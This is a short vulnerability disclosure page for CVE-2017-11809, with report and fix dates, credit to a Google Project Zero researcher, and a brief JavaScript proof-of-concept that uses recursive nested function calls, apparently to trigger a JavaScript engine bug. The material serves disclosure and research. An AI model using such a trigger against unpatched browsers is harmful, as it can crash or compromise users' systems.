Skip to content

Latest commit

 

History

History
29 lines (20 loc) · 544 Bytes

CVE-2017-11809.md

File metadata and controls

29 lines (20 loc) · 544 Bytes

CVE-2017-11809

  • Report: Aug 2017
  • Fix: Oct 2017
  • Credit: lokihardt of Google Project Zero

PoC

function trigger() {
    let a, b, c;

    function g() {
        trigger();

        a, b, c;
    }

    g();
}

trigger();

Reference